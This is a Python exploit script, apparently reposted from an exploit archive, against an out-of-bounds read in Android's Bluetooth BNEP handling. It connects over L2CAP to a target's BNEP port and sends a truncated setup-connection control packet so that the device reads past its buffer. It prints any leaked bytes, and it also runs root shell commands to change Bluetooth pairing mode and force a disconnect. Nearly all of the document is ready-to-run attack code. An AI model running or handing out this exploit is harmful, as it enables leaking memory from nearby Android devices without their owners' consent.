Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit

import os
import sys
import struct
 
import bluetooth
 
 
BNEP_PSM = 15
BNEP_FRAME_CONTROL = 0x01
 
# Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
 
 
def oob_read(src_bdaddr, dst):
 
    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.settimeout(5)
    bnep.bind((src_bdaddr, 0))
    print 'Connecting to BNEP...'
    bnep.connect((dst, BNEP_PSM))
    bnep.settimeout(1)
    print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..."
 
    # This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
    # plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
    # It doesn't include the 'len' field, therefore it is read from out of bounds
    bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
    try:
        data = bnep.recv(3)
    except bluetooth.btcommon.BluetoothError:
        data = ''
 
    if data:
        print '%r' % data
    else:
        print '[No data]'
 
    print 'Closing connection.'
    bnep.close()
 
 
def main(src_hci, dst):
    os.system('hciconfig %s sspmode 0' % (src_hci,))
    os.system('hcitool dc %s' % (dst,))
 
    oob_read(src_hci, dst)
 
 
if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
    else:
        if os.getuid():
            print 'Error: This script must be run as root.'
        else:
            main(sys.argv[1], sys.argv[2])

#  0day.today [2018-04-11]  #